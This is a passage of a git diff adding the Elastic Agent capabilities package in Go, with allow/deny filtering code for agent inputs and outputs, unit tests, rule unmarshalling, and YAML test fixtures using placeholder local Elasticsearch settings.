typeNode.(string) + if !ok { + continue + } + + conditionNode, ok := node[conditionKey] + if !ok { + // was not allowed nor denied -> allowing + typesMap[inputType] = true + continue + } + + isAllowed, ok := conditionNode.(bool) + if !ok { + assert.Fail(t, fmt.Sprintf("condition should be bool but it's not for input '%s'", inputType)) + continue + } + + if isAllowed { + typesMap[inputType] = true + } + } + + assert.Equal(t, len(expectedInputs), len(typesMap)) + for _, ei := range expectedInputs { + _, found = typesMap[ei] + assert.True(t, found, fmt.Sprintf("'%s' not found", ei)) + delete(typesMap, ei) + } + + for k := range typesMap { + assert.Fail(t, fmt.Sprintf("'%s' found but was not expected", k)) + } +} + +func runMultiInputTest(t *testing.T, l *logger.Logger, rd *ruleDefinitions, expectedInputs []string, initialInputs []string) { + tr := &testReporter{} + cap, err := newInputsCapability(l, rd, tr) + assert.NoError(t, err, "error not expected, provided eql is valid") + assert.NotNil(t, cap, "cap should be created") + + inputs := getInputsMap(initialInputs...) + assert.NotNil(t, inputs) + + outAfter, err := cap.Apply(inputs) + assert.NoError(t, err, "should not be failing") + assert.NotEqual(t, ErrBlocked, err, "should not be blocking") + + newMap, ok := outAfter.(map[string]interface{}) + assert.True(t, ok, "out ast should be AST") + assert.NotNil(t, newMap) + + inputsNode, found := newMap["inputs"] + assert.True(t, found, "inputsnot found") + + inputsList, ok := inputsNode.([]map[string]interface{}) + assert.True(t, ok, "inputs not a list") + + typesMap := make(map[string]bool) + for _, node := range inputsList { + typeNode, ok := node["type"] + if !ok { + continue + } + + inputType, ok := typeNode.(string) + if !ok { + continue + } + typesMap[inputType] = true + } + + assert.Equal(t, len(expectedInputs), len(typesMap)) + for _, ei := range expectedInputs { + _, found = typesMap[ei] + assert.True(t, found, fmt.Sprintf("'%s' not found", ei)) + delete(typesMap, ei) + } + + for k := range typesMap { + assert.Fail(t, fmt.Sprintf("'%s' found but was not expected", k)) + } +} + +func getInputs(tt ...string) *transpiler.AST { + astMap := getInputsMap(tt...) + ast, _ := transpiler.NewAST(astMap) + return ast +} + +func getInputsMap(tt ...string) map[string]interface{} { + astMap := make(map[string]interface{}) + inputs := make([]map[string]interface{}, 0, len(tt)) + + for _, t := range tt { + mm := map[string]interface{}{ + "type": t, + "use_output": "testing", + "data_stream.namespace": "default", + "streams": []map[string]interface{}{ + { + "metricset": "cpu", + "data_stream.dataset": "system.cpu", + }, + { + "metricset": "memory", + "data_stream.dataset": "system.memory", + }, + }, + } + inputs = append(inputs, mm) + } + + astMap["inputs"] = inputs + + return astMap +} + +type testReporter struct{} + +func (*testReporter) Update(state.Status, string) {} +func (*testReporter) Unregister() {} diff --git a/x-pack/elastic-agent/pkg/capabilities/output.go b/x-pack/elastic-agent/pkg/capabilities/output.go new file mode 100644 index 000000000000..bf47123f3379 --- /dev/null +++ b/x-pack/elastic-agent/pkg/capabilities/output.go @@ -0,0 +1,214 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +package capabilities + +import ( + "fmt" + + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/state" + + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/status" +) + +const ( + outputKey = "outputs" + typeKey = "type" +) + +func newOutputsCapability(log *logger.Logger, rd *ruleDefinitions, reporter status.Reporter) (Capability, error) { + if rd == nil { + return &multiOutputsCapability{log: log, caps: []*outputCapability{}}, nil + } + + caps := make([]*outputCapability, 0, len(rd.Capabilities)) + + for _, r := range rd.Capabilities { + c, err := newOutputCapability(log, r, reporter) + if err != nil { + return nil, err + } + + if c != nil { + caps = append(caps, c) + } + } + + return &multiOutputsCapability{log: log, caps: caps}, nil +} + +func newOutputCapability(log *logger.Logger, r ruler, reporter status.Reporter) (*outputCapability, error) { + cap, ok := r.(*outputCapability) + if !ok { + return nil, nil + } + + cap.log = log + cap.reporter = reporter + return cap, nil +} + +type outputCapability struct { + log *logger.Logger + reporter status.Reporter + Name string `json:"name,omitempty" yaml:"name,omitempty"` + Type string `json:"rule" yaml:"rule"` + Output string `json:"output" yaml:"output"` +} + +func (c *outputCapability) Apply(cfgMap map[string]interface{}) (map[string]interface{}, error) { + outputIface, ok := cfgMap[outputKey] + if ok { + outputs, ok := outputIface.(map[string]interface{}) + if ok { + renderedOutputs, err := c.renderOutputs(outputs) + if err != nil { + c.log.Errorf("marking outputs failed for capability '%s': %v", c.name(), err) + return cfgMap, err + } + + cfgMap[outputKey] = renderedOutputs + return cfgMap, nil + } + + return cfgMap, nil + } + + return cfgMap, nil +} + +func (c *outputCapability) Rule() string { + return c.Type +} + +func (c *outputCapability) name() string { + if c.Name != "" { + return c.Name + } + + t := "A" + if c.Type == denyKey { + t = "D" + } + + // e.g OA(*) or OD(logstash) + c.Name = fmt.Sprintf("O%s(%s)", t, c.Output) + return c.Name +} + +func (c *outputCapability) renderOutputs(outputs map[string]interface{}) (map[string]interface{}, error) { + for outputName, outputIface := range outputs { + output, ok := outputIface.(map[string]interface{}) + if !ok { + continue + } + + outputTypeIface, ok := output[typeKey] + if !ok { + return nil, errors.New(fmt.Sprintf("output '%s' is missing type key", outputName), errors.TypeConfig) + } + + outputType, ok := outputTypeIface.(string) + if !ok { + continue + } + + // if input does not match definition continue + if !matchesExpr(c.Output, outputType) { + continue + } + + if _, found := output[conditionKey]; found { + // we already visited + continue + } + + isSupported := c.Type == allowKey + output[conditionKey] = isSupported + outputs[outputName] = output + + if !isSupported { + msg := fmt.Sprintf("output '%s' is left out due to capability restriction '%s'", outputName, c.name()) + c.log.Errorf(msg) + c.reporter.Update(state.Degraded, msg) + } + } + + return outputs, nil +} + +type multiOutputsCapability struct { + caps []*outputCapability + log *logger.Logger +} + +func (c *multiOutputsCapability) Apply(in interface{}) (interface{}, error) { + configMap, transform, err := configObject(in) + if err != nil { + c.log.Errorf("creating configuration object failed for capability 'multi-outputs': %v", err) + return in, nil + } + if configMap == nil { + return in, nil + } + + for _, cap := range c.caps { + // input capability is not blocking + configMap, err = cap.Apply(configMap) + if err != nil { + return in, err + } + } + + configMap, err = c.cleanupOutput(configMap) + if err != nil { + c.log.Errorf("cleaning up config object failed for capability 'multi-outputs': %v", err) + return in, nil + } + + if transform == nil { + return configMap, nil + } + + return transform(configMap), nil +} + +func (c *multiOutputsCapability) cleanupOutput(cfgMap map[string]interface{}) (map[string]interface{}, error) { + outputsIface, found := cfgMap[outputKey] + if !found { + return cfgMap, nil + } + + outputsMap, ok := outputsIface.(map[string]interface{}) + if !ok { + return nil, fmt.Errorf("outputs must be a map") + } + + for outputName, outputIface := range outputsMap { + acceptValue := true + + outputMap, ok := outputIface.(map[string]interface{}) + if ok { + conditionIface, found := outputMap[conditionKey] + if found { + conditionVal, ok := conditionIface.(bool) + if ok { + acceptValue = conditionVal + } + } + } + + if !acceptValue { + delete(outputsMap, outputName) + continue + } + + delete(outputMap, conditionKey) + } + + cfgMap[outputKey] = outputsMap + return cfgMap, nil +} diff --git a/x-pack/elastic-agent/pkg/capabilities/output_test.go b/x-pack/elastic-agent/pkg/capabilities/output_test.go new file mode 100644 index 000000000000..fca32effadca --- /dev/null +++ b/x-pack/elastic-agent/pkg/capabilities/output_test.go @@ -0,0 +1,373 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +package capabilities + +import ( + "fmt" + "testing" + + "github.com/stretchr/testify/assert" + + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/transpiler" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi" +) + +func TestMultiOutput(t *testing.T) { + tr := &testReporter{} + l, _ := logger.New("test") + t.Run("no match", func(t *testing.T) { + rd := &ruleDefinitions{ + Capabilities: []ruler{&outputCapability{ + Type: "allow", + Output: "something_else", + }}, + } + + initialOutputs := []string{"elasticsearch", "logstash"} + expectedOutputs := []string{"elasticsearch", "logstash"} + runMultiOutputTest(t, l, rd, expectedOutputs, initialOutputs) + }) + + t.Run("filters logstash", func(t *testing.T) { + rd := &ruleDefinitions{ + Capabilities: []ruler{&outputCapability{ + Type: "deny", + Output: "logstash", + }}, + } + + initialOutputs := []string{"elasticsearch", "logstash"} + expectedOutputs := []string{"elasticsearch"} + runMultiOutputTest(t, l, rd, expectedOutputs, initialOutputs) + }) + + t.Run("allows logstash only", func(t *testing.T) { + rd := &ruleDefinitions{ + Capabilities: []ruler{ + &outputCapability{ + Type: "allow", + Output: "logstash", + }, + &outputCapability{ + Type: "deny", + Output: "*", + }, + }, + } + + initialOutputs := []string{"elasticsearch", "logstash"} + expectedOutputs := []string{"logstash"} + runMultiOutputTest(t, l, rd, expectedOutputs, initialOutputs) + }) + + t.Run("allows everything", func(t *testing.T) { + rd := &ruleDefinitions{ + Capabilities: []ruler{&outputCapability{ + Type: "allow", + Output: "*", + }}, + } + + initialOutputs := []string{"elasticsearch", "logstash"} + expectedOutputs := []string{"elasticsearch", "logstash"} + runMultiOutputTest(t, l, rd, expectedOutputs, initialOutputs) + }) + + t.Run("deny everything", func(t *testing.T) { + rd := &ruleDefinitions{ + Capabilities: []ruler{&outputCapability{ + Type: "deny", + Output: "*", + }}, + } + + initialOutputs := []string{"elasticsearch", "logstash"} + expectedOutputs := []string{} + runMultiOutputTest(t, l, rd, expectedOutputs, initialOutputs) + }) + + t.Run("keep format", func(t *testing.T) { + rd := &ruleDefinitions{ + Capabilities: []ruler{&outputCapability{ + Type: "deny", + Output: "logstash", + }}, + } + + initialOutputs := []string{"elasticsearch", "logstash"} + expectedOutputs := []string{"elasticsearch"} + + cap, err := newOutputsCapability(l, rd, tr) + assert.NoError(t, err, "error not expected, provided eql is valid") + assert.NotNil(t, cap, "cap should be created") + + outputs := getOutputs(initialOutputs...) + assert.NotNil(t, outputs) + + res, err := cap.Apply(outputs) + assert.NoError(t, err, "should not be failing") + assert.NotEqual(t, ErrBlocked, err, "should not be blocking") + + ast, ok := res.(*transpiler.AST) + assert.True(t, ok, "expecting an ast") + + outputsIface, found := transpiler.Lookup(ast, outputKey) + assert.True(t, found, "output not found") + + outputsDict, ok := outputsIface.Value().(*transpiler.Dict) + assert.True(t, ok, "expecting a Dict for outputs") + + for _, in := range expectedOutputs { + var typeFound bool + nodes := outputsDict.Value().([]transpiler.Node) + for _, outputKeyNode := range nodes { + outputNode, ok := outputKeyNode.(*transpiler.Key).Value().(*transpiler.Dict) + assert.True(t, ok, "output type key not string") + + typeNode, found := outputNode.Find("type") + assert.True(t, found, "type not found") + + typeNodeStr, ok := typeNode.Value().(*transpiler.StrVal) + assert.True(t, ok, "type node not strval") + outputType, ok := typeNodeStr.Value().(string) + assert.True(t, ok, "output type key not string") + if outputType == in { + typeFound = true + break + } + } + + assert.True(t, typeFound, fmt.Sprintf("output '%s' type key not found", in)) + } + }) + + t.Run("unknown action", func(t *testing.T) { + rd := &ruleDefinitions{ + Capabilities: []ruler{&outputCapability{ + Type: "deny", + Output: "logstash", + }}, + } + + cap, err := newOutputsCapability(l, rd, tr) + assert.NoError(t, err, "error not expected, provided eql is valid") + assert.NotNil(t, cap, "cap should be created") + + apiAction := fleetapi.ActionUpgrade{} + outAfter, err := cap.Apply(apiAction) + + assert.NoError(t, err, "should not be failing") + assert.NotEqual(t, ErrBlocked, err, "should not be blocking") + assert.Equal(t, apiAction, outAfter, "action should not be altered") + }) +} + +func TestOutput(t *testing.T) { + tr := &testReporter{} + l, _ := logger.New("test") + t.Run("invalid rule", func(t *testing.T) { + r := &upgradeCapability{} + cap, err := newOutputCapability(l, r, tr) + assert.NoError(t, err, "no error expected") + assert.Nil(t, cap, "cap should not be created") + }) + + t.Run("empty eql", func(t *testing.T) { + r := &outputCapability{ + Type: "allow", + Output: "", + } + cap, err := newOutputCapability(l, r, tr) + assert.NoError(t, err, "error not expected, provided eql is valid") + assert.NotNil(t, cap, "cap should be created") + }) + + t.Run("valid action - 1/1 match", func(t *testing.T) { + r := &outputCapability{ + Type: "allow", + Output: "logstash", + } + + initialOutputs := []string{"logstash"} + expectedOutputs := []string{"logstash"} + runOutputTest(t, l, r, expectedOutputs, initialOutputs) + }) + + t.Run("valid action - 0/1 match", func(t *testing.T) { + r := &outputCapability{ + Type: "allow", + Output: "elasticsearch", + } + + initialOutputs := []string{"logstash"} + expectedOutputs := []string{"logstash"} + runOutputTest(t, l, r, expectedOutputs, initialOutputs) + }) + + t.Run("valid action - deny logstash", func(t *testing.T) { + r := &outputCapability{ + Type: "deny", + Output: "logstash", + } + + initialOutputs := []string{"logstash", "elasticsearch"} + expectedOutputs := []string{"elasticsearch"} + runOutputTest(t, l, r, expectedOutputs, initialOutputs) + }) + + t.Run("valid action - multiple outputs 1 explicitely allowed", func(t *testing.T) { + r := &outputCapability{ + Type: "allow", + Output: "logstash", + } + + initialOutputs := []string{"logstash", "elasticsearch"} + expectedOutputs := []string{"logstash", "elasticsearch"} + runOutputTest(t, l, r, expectedOutputs, initialOutputs) + }) +} + +func runMultiOutputTest(t *testing.T, l *logger.Logger, rd *ruleDefinitions, expectedOutputs []string, initialOutputs []string) { + tr := &testReporter{} + cap, err := newOutputsCapability(l, rd, tr) + assert.NoError(t, err, "error not expected, provided eql is valid") + assert.NotNil(t, cap, "cap should be created") + + cfg := getOutputsMap(initialOutputs...) + assert.NotNil(t, cfg) + + outAfter, err := cap.Apply(cfg) + + assert.NoError(t, err, "should not be failing") + assert.NotEqual(t, ErrBlocked, err, "should not be blocking") + + newMap, ok := outAfter.(map[string]interface{}) + assert.True(t, ok, "out ast should be a map") + assert.NotNil(t, newMap) + + outputsNode, found := newMap[outputKey] + assert.True(t, found, "outputs not found") + + outputsList, ok := outputsNode.(map[string]interface{}) + assert.True(t, ok, "outputs not a list") + + typesMap := make(map[string]bool) + for _, nodeIface := range outputsList { + node, ok := nodeIface.(map[string]interface{}) + if !ok { + continue + } + + typeNode, ok := node["type"] + if !ok { + continue + } + + outputType, ok := typeNode.(string) + if !ok { + continue + } + typesMap[outputType] = true + } + + assert.Equal(t, len(expectedOutputs), len(typesMap)) + for _, ei := range expectedOutputs { + _, found = typesMap[ei] + assert.True(t, found, fmt.Sprintf("'%s' not found", ei)) + delete(typesMap, ei) + } + + for k := range typesMap { + assert.Fail(t, fmt.Sprintf("'%s' found but was not expected", k)) + } +} + +func runOutputTest(t *testing.T, l *logger.Logger, r *outputCapability, expectedOutputs []string, initialOutputs []string) { + tr := &testReporter{} + cap, err := newOutputCapability(l, r, tr) + assert.NoError(t, err, "error not expected, provided eql is valid") + assert.NotNil(t, cap, "cap should be created") + + outputs := getOutputsMap(initialOutputs...) + assert.NotNil(t, outputs) + + newMap, err := cap.Apply(outputs) + assert.NoError(t, err, "should not be failing") + assert.NotEqual(t, ErrBlocked, err, "should not be blocking") + + outputsNode, found := newMap[outputKey] + assert.True(t, found, "outputs not found") + + outputsList, ok := outputsNode.(map[string]interface{}) + assert.True(t, ok, "outputs not a map") + + typesMap := make(map[string]bool) + for _, nodeIface := range outputsList { + node, ok := nodeIface.(map[string]interface{}) + if !ok { + continue + } + + typeNode, ok := node[typeKey] + if !ok { + continue + } + + outputType, ok := typeNode.(string) + if !ok { + continue + } + + conditionNode, ok := node[conditionKey] + if !ok { + // was not allowed nor denied -> allowing + typesMap[outputType] = true + continue + } + + isAllowed, ok := conditionNode.(bool) + if !ok { + assert.Fail(t, fmt.Sprintf("condition should be bool but it's not for output '%s'", outputType)) + continue + } + + if isAllowed { + typesMap[outputType] = true + } + } + + assert.Equal(t, len(expectedOutputs), len(typesMap)) + for _, ei := range expectedOutputs { + _, found = typesMap[ei] + assert.True(t, found, fmt.Sprintf("'%s' not found", ei)) + delete(typesMap, ei) + } + + for k := range typesMap { + assert.Fail(t, fmt.Sprintf("'%s' found but was not expected", k)) + } +} + +func getOutputs(tt ...string) *transpiler.AST { + astMap := getOutputsMap(tt...) + ast, _ := transpiler.NewAST(astMap) + return ast +} + +func getOutputsMap(tt ...string) map[string]interface{} { + cfgMap := make(map[string]interface{}) + outputs := make(map[string]interface{}) + + for i, t := range tt { + outputs[fmt.Sprintf("id%d", i)] = map[string]interface{}{ + "type": t, + "hosts": []string{"testing"}, + } + } + + cfgMap[outputKey] = outputs + return cfgMap +} diff --git a/x-pack/elastic-agent/pkg/capabilities/rule.go b/x-pack/elastic-agent/pkg/capabilities/rule.go new file mode 100644 index 000000000000..93a28067a646 --- /dev/null +++ b/x-pack/elastic-agent/pkg/capabilities/rule.go @@ -0,0 +1,112 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +package capabilities + +import ( + "encoding/json" + "fmt" + + "gopkg.in/yaml.v2" +) + +const ( + allowKey = "allow" + denyKey = "deny" + conditionKey = "__condition__" +) + +type ruler interface { + Rule() string +} + +type capabilitiesList []ruler + +type ruleDefinitions struct { + Version string `yaml:"version" json:"version"` + Capabilities capabilitiesList `yaml:"capabilities" json:"capabilities"` +} + +func (r *capabilitiesList) UnmarshalJSON(p []byte) error { + var tmpArray []json.RawMessage + + err := json.Unmarshal(p, &tmpArray) + if err != nil { + return err + } + + for i, t := range tmpArray { + mm := make(map[string]interface{}) + if err := json.Unmarshal(t, &mm); err != nil { + return err + } + + if _, found := mm["input"]; found { + cap := &inputCapability{} + if err := json.Unmarshal(t, &cap); err != nil { + return err + } + (*r) = append((*r), cap) + + } else if _, found = mm["output"]; found { + cap := &outputCapability{} + if err := json.Unmarshal(t, &cap); err != nil { + return err + } + (*r) = append((*r), cap) + + } else if _, found = mm["upgrade"]; found { + cap := &upgradeCapability{} + if err := json.Unmarshal(t, &cap); err != nil { + return err + } + (*r) = append((*r), cap) + } else { + return fmt.Errorf("unexpected capability type for definition number '%d'", i) + } + } + + return nil +} + +func (r *capabilitiesList) UnmarshalYAML(unmarshal func(interface{}) error) error { + var tmpArray []map[string]interface{} + + err := unmarshal(&tmpArray) + if err != nil { + return err + } + + for i, mm := range tmpArray { + partialYaml, err := yaml.Marshal(mm) + if err != nil { + return err + } + if _, found := mm["input"]; found { + cap := &inputCapability{} + if err := yaml.Unmarshal(partialYaml, &cap); err != nil { + return err + } + (*r) = append((*r), cap) + + } else if _, found = mm["output"]; found { + cap := &outputCapability{} + if err := yaml.Unmarshal(partialYaml, &cap); err != nil { + return err + } + (*r) = append((*r), cap) + + } else if _, found = mm["upgrade"]; found { + cap := &upgradeCapability{} + if err := yaml.Unmarshal(partialYaml, &cap); err != nil { + return err + } + (*r) = append((*r), cap) + } else { + return fmt.Errorf("unexpected capability type for definition number '%d'", i) + } + } + + return nil +} diff --git a/x-pack/elastic-agent/pkg/capabilities/rule_test.go b/x-pack/elastic-agent/pkg/capabilities/rule_test.go new file mode 100644 index 000000000000..5f3bab860bf3 --- /dev/null +++ b/x-pack/elastic-agent/pkg/capabilities/rule_test.go @@ -0,0 +1,122 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +package capabilities + +import ( + "encoding/json" + "reflect" + "testing" + + "github.com/stretchr/testify/assert" + "gopkg.in/yaml.v2" +) + +func TestUnmarshal(t *testing.T) { + t.Run("valid json", func(t *testing.T) { + rr := &ruleDefinitions{Capabilities: make([]ruler, 0, 0)} + + err := json.Unmarshal(jsonDefinitionValid, &rr) + + assert.Nil(t, err, "no error is expected") + assert.Equal(t, 3, len(rr.Capabilities)) + assert.Equal(t, "*capabilities.upgradeCapability", reflect.TypeOf(rr.Capabilities[0]).String()) + assert.Equal(t, "*capabilities.inputCapability", reflect.TypeOf(rr.Capabilities[1]).String()) + assert.Equal(t, "*capabilities.outputCapability", reflect.TypeOf(rr.Capabilities[2]).String()) + }) + + t.Run("invalid json", func(t *testing.T) { + var rr ruleDefinitions + + err := json.Unmarshal(jsonDefinitionInvalid, &rr) + + assert.Error(t, err, "error is expected") + }) + + t.Run("valid yaml", func(t *testing.T) { + rr := &ruleDefinitions{Capabilities: make([]ruler, 0, 0)} + + err := yaml.Unmarshal(yamlDefinitionValid, &rr) + + assert.Nil(t, err, "no error is expected") + assert.Equal(t, 3, len(rr.Capabilities)) + assert.Equal(t, "*capabilities.upgradeCapability", reflect.TypeOf(rr.Capabilities[0]).String()) + assert.Equal(t, "*capabilities.inputCapability", reflect.TypeOf(rr.Capabilities[1]).String()) + assert.Equal(t, "*capabilities.outputCapability", reflect.TypeOf(rr.Capabilities[2]).String()) + }) + + t.Run("invalid yaml", func(t *testing.T) { + var rr ruleDefinitions + + err := yaml.Unmarshal(yamlDefinitionInvalid, &rr) + + assert.Error(t, err, "error is expected") + }) +} + +var jsonDefinitionValid = []byte(`{ +"capabilities": [ + { + "upgrade": "${version} == '8.0.0'", + "rule": "allow" + }, + { + "input": "system/metrics", + "rule": "allow" + }, + { + "output": "elasticsearch", + "rule": "allow" + } +] +}`) + +var jsonDefinitionInvalid = []byte(`{ +"capabilities": [ + { + "upgrade": "${version} == '8.0.0'", + "rule": "allow" +}, +{ + "input": "system/metrics", + "rule": "allow" +}, +{ + "output": "elasticsearch", + "rule": "allow" +}, +{ + "ayay": "elasticsearch", + "rule": "allow" +} +] +}`) + +var yamlDefinitionValid = []byte(`capabilities: +- + rule: "allow" + upgrade: "${version} == '8.0.0'" +- + input: "system/metrics" + rule: "allow" +- + output: "elasticsearch" + rule: "allow" +`) + +var yamlDefinitionInvalid = []byte(` +capabilities: +- + rule: allow + upgrade: "${version} == '8.0.0'" +- + input: "system/metrics" + rule: allow +- + output: elasticsearch + rule: allow +- + ayay: elasticsearch + rule: allow +`) diff --git a/x-pack/elastic-agent/pkg/capabilities/testdata/allow_metrics-capabilities.yml b/x-pack/elastic-agent/pkg/capabilities/testdata/allow_metrics-capabilities.yml new file mode 100644 index 000000000000..408be363fc65 --- /dev/null +++ b/x-pack/elastic-agent/pkg/capabilities/testdata/allow_metrics-capabilities.yml @@ -0,0 +1,6 @@ +version: 0.1.0 +capabilities: +- rule: allow + input: system/metrics +- rule: deny + input: "*" diff --git a/x-pack/elastic-agent/pkg/capabilities/testdata/allow_metrics-config.yml b/x-pack/elastic-agent/pkg/capabilities/testdata/allow_metrics-config.yml new file mode 100644 index 000000000000..9658895c2aff --- /dev/null +++ b/x-pack/elastic-agent/pkg/capabilities/testdata/allow_metrics-config.yml @@ -0,0 +1,20 @@ +outputs: + default: + type: elasticsearch + hosts: [127.0.0.1:9200] + username: elastic + password: changeme + +inputs: + - type: system/metrics + data_stream.namespace: default + use_output: default + streams: + - metricset: cpu + data_stream.dataset: system.cpu + - type: system/logs + data_stream.namespace: default + use_output: default + streams: + - paths: "/var/log/file1" + data_stream.dataset: system.var.log diff --git a/x-pack/elastic-agent/pkg/capabilities/testdata/allow_metrics-result.yml b/x-pack/elastic-agent/pkg/capabilities/testdata/allow_metrics-result.yml new file mode 100644 index 000000000000..cf9d47856084 --- /dev/null +++ b/x-pack/elastic-agent/pkg/capabilities/testdata/allow_metrics-result.yml @@ -0,0 +1,14 @@ +outputs: + default: + type: elasticsearch + hosts: [127.0.0.1:9200] + username: elastic + password: changeme + +inputs: + - type: system/metrics + data_stream.namespace: default + use_output: default + streams: + - metricset: cpu + data_stream.dataset: system.cpu diff --git a/x-pack/elastic-agent/pkg/capabilities/testdata/deny_logs-capabilities.yml b/x-pack/elastic-agent/pkg/capabilities/testdata/deny_logs-capabilities.yml new file mode 100644 index 000000000000..47722d814ed0 --- /dev/null +++ b/x-pack/elastic-agent/pkg/capabilities/testdata/deny_logs-capabilities.yml @@ -0,0 +1,4 @@ +version: 0.1.0 +capabilities: +- rule: deny + input: system/logs diff --git a/x-pack/elastic-agent/pkg/capabilities/testdata/deny_logs-config.yml b/x-pack/elastic-agent/pkg/capabilities/testdata/deny_logs-config.yml new file mode 100644 index 000000000000..9658895c2aff --- /dev/null +++ b/x-pack/elastic-agent/pkg/capabilities/testdata/deny_logs-config.yml @@ -0,0 +1,20 @@ +outputs: + default: + type: elasticsearch + hosts: [127.0.0.1:9200] + username: elastic + password: changeme + +inputs: + - type: system/metrics + data_stream.namespace: default + use_output: default + streams: + - metricset: cpu + data_stream.dataset: system.cpu + - type: system/logs + data_stream.namespace: default + use_output: default + streams: + - paths: "/var/log/file1" + data_stream.dataset: system.var.log diff --git a/x-pack/elastic-agent/pkg/capabilities/testdata/deny_logs-result.yml b/x-pack/elastic-agent/pkg/capabilities/testdata/deny_logs-result.yml new file mode 100644 index 000000000000..cf9d47856084 --- /dev/null +++ b/x-pack/elastic-agent/pkg/capabilities/testdata/deny_logs-result.yml @@ -0,0 +1,14 @@ +outputs: + default: + type: elasticsearch + hosts: [127.0.0.1:9200] + username: elastic + password: changeme + +inputs: + - type: system/metrics + data_stream.namespace: default + use_output: default + streams: + - metricset: cpu + data_stream.dataset: system.cpu diff --git a/x-pack/elastic-agent/pkg/capabilities/testdata/filter_metrics-capabilities.yml b/x-pack/elastic-agent/pkg/capabilities/testdata/filter_metrics-capabilities.yml new file mode 100644 index 000000000000..a93e0ffcdb1c --- /dev/null +++ b/x-pack/elastic-agent/pkg/capabilities/testdata/filter_metrics-capabilities.yml @@ -0,0 +1,4 @@ +version: 0.1.0 +capabilities: +- rule: allow + input: system/metrics diff --git a/x-pack/elastic-agent/pkg/capabilities/testdata/filter_metrics-config.yml b/x-pack/elastic-agent/pkg/capabilities/testdata/filter_metrics-config.yml new file mode 100644 index 000000000000..9658895c2aff --- /dev/null +++ b/x-pack/elastic-agent/pkg/capabilities/testdata/filter_metrics-config.yml @@ -0,0 +1,20 @@ +outputs: + default: + type: elasticsearch + hosts: [127.0.0.1:9200] + username: elastic + password: changeme + +inputs: + - type: system/metrics + data_stream.namespace: default + use_output: default + streams: + - metricset: cpu + data_stream.dataset: system.cpu + - type: system/logs + data_stream.namespace: default + use_output: default + streams: + - paths: "/var/log/file1" + data_stream.dataset: system.var.log diff --git a/x-pack/elastic-agent/pkg/capabilities/testdata/filter_metrics-result.yml b/x-pack/elastic-agent/pkg/capabilities/testdata/filter_metrics-result.yml new file mode 100644 index 000000000000..9658895c2aff --- /dev/null +++ b/x-pack/elastic-agent/pkg/capabilities/testdata/filter_metrics-result.yml @@ -0,0 +1,20 @@ +outputs: + default: + type: elasticsearch + hosts: [127.0.0.1:9200] + username: elastic + password: changeme + +inputs: + - type: system/metrics + data_stream.namespace: default + use_output: default + streams: + - metricset: cpu + data_stream.dataset: system.cpu + - type: system/logs + data_stream.namespace: default + use_output: default + streams: + - paths: "/var/log/file1" + data_stream.dataset: system.var.log diff --git a/x-pack/elastic-agent/pkg/capabilities/testdata/invalid-capabilities.yml b/x-pack/elastic-agent/pkg/capabilities/testdata/invalid-capabilities.yml new file mode 100644 index 000000000000..408be363fc65 --- /dev/null +++ b/x-pack/elastic-agent/pkg/capabilities/testdata/invalid-capabilities.yml @@ -0,0 +1,6 @@ +version: 0.1.0 +capabilities: +- rule: allow + input: system/metrics +- rule: deny + input: "*" diff --git a/x-pack/elastic-agent/pkg/capabilities/testdata/invalid-config.yml b/x-pack/elastic-agent/pkg/capabilities/testdata/invalid-config.yml new file mode 100644 index 000000000000..2133ceac288e --- /dev/null +++ b/x-pack/elastic-agent/pkg/capabilities/testdata/invalid-config.yml @@ -0,0 +1,18 @@ +outputs: + default: + type: elasticsearch + hosts: [127.0.0.1:9200] + username: elastic + password: changeme + +inputs: + - data_stream.namespace: default + use_output: default + streams: + - metricset: cpu + data_stream.dataset: system.cpu + - data_stream.namespace: default + use_output: default + streams: + - paths: "/var/log/file1" + data_stream.dataset: system.var.log diff --git a/x-pack/elastic-agent/pkg/capabilities/testdata/invalid_output-capabilities.yml b/x-pack/elastic-agent/pkg/capabilities/testdata/invalid_output-capabilities.yml new file mode 100644 index 000000000000..13ebde75da08 --- /dev/null +++ b/x-pack/elastic-agent/pkg/capabilities/testdata/invalid_output-capabilities.yml @@ -0,0 +1,4 @@ +version: 0.1.0 +capabilities: +- rule: allow + output: kafka diff --git a/x-pack/elastic-agent/pkg/capabilities/testdata/invalid_output-config.yml b/x-pack/elastic-agent/pkg/capabilities/testdata/invalid_output-config.yml new file mode 100644 index 000000000000..e648faeae2ff --- /dev/null +++ b/x-pack/elastic-agent/pkg/capabilities/testdata/invalid_output-config.yml @@ -0,0 +1,19 @@ +outputs: + default: + hosts: [127.0.0.1:9200] + username: elastic + password: changeme + +inputs: + - type: system/metrics + data_stream.namespace: default + use_output: default + streams: + - metricset: cpu + data_stream.dataset: system.cpu + - type: system/logs + data_stream.namespace: default + use_output: default + streams: + - paths: "/var/log/file1" + data_stream.dataset: system.var.log diff --git a/x-pack/elastic-agent/pkg/capabilities/testdata/no_caps-config.yml b/x-pack/elastic-agent/pkg/capabilities/testdata/no_caps-config.yml new file mode 100644 index 000000000000..9658895c2aff --- /dev/null +++ b/x-pack/elastic-agent/pkg/capabilities/testdata/no_caps-config.yml @@ -0,0 +1,20 @@ +outputs: + default: + type: elasticsearch + hosts: [127.0.0.1:9200] + username: elastic + password: changeme + +inputs: + - type: system/metrics + data_stream.namespace: default + use_output: default + streams: + - metricset: cpu + data_stream.dataset: system.cpu + - type: system/logs + data_stream.namespace: default + use_output: default + streams: + - paths: "/var/log/file1" + 